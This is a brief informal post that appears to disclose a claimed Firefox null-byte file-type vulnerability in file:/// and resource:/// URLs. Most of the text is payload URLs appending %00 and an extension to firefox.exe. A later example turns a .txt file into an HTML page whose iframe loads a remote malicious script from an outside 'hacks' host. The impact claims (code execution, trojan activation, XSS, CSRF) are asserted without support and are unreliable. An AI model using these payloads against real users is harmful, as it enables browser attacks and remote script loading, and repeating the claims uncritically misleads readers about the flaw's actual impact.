Firefox Remote & Local Code Excution 0day.

I found this vulnerability in Firefox moments ago while I was playing with the urlbar. It seems Firefox is vulnerable to null byte file type corruption. It is possible to execute files as a different filetype and trick Firefox into executing it. Is this dangerous? yeah it's pretty bad. Pointers that are vulnerable:file:///resource:Use:[uri]/[filelocation]/[file][.ext]%00[.ext]Example:file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.htmlor:resource:///README.txt%00.htmlMore filetypes:file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.htmlfile:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.jsfile:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.pdffile:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.docfile:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xlsprobably every filetype.Oh and: file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xpi :)This could lead to various exploits, to name a few:- Dossing a user, the above example does it almost.- Code execution- File access- Trojan activation- Virus activation- Reflective Cross Site Scripting (RXSS)- Cross Site Request Forgeries (CSRF)Another exampleIt is possible to turn regular .txt stored files into full Javascript html zombies:file:///[filelocation]/troy.txt%00.htmltroy.txt could contain:/*Bunch of malicious Javascript*/Or:<html><iframe name="bla" src="http://www.0x000000.com/hacks/?troy.js" width="100%" height="900"></iframe></html>Well, I guess you get the point: nasty.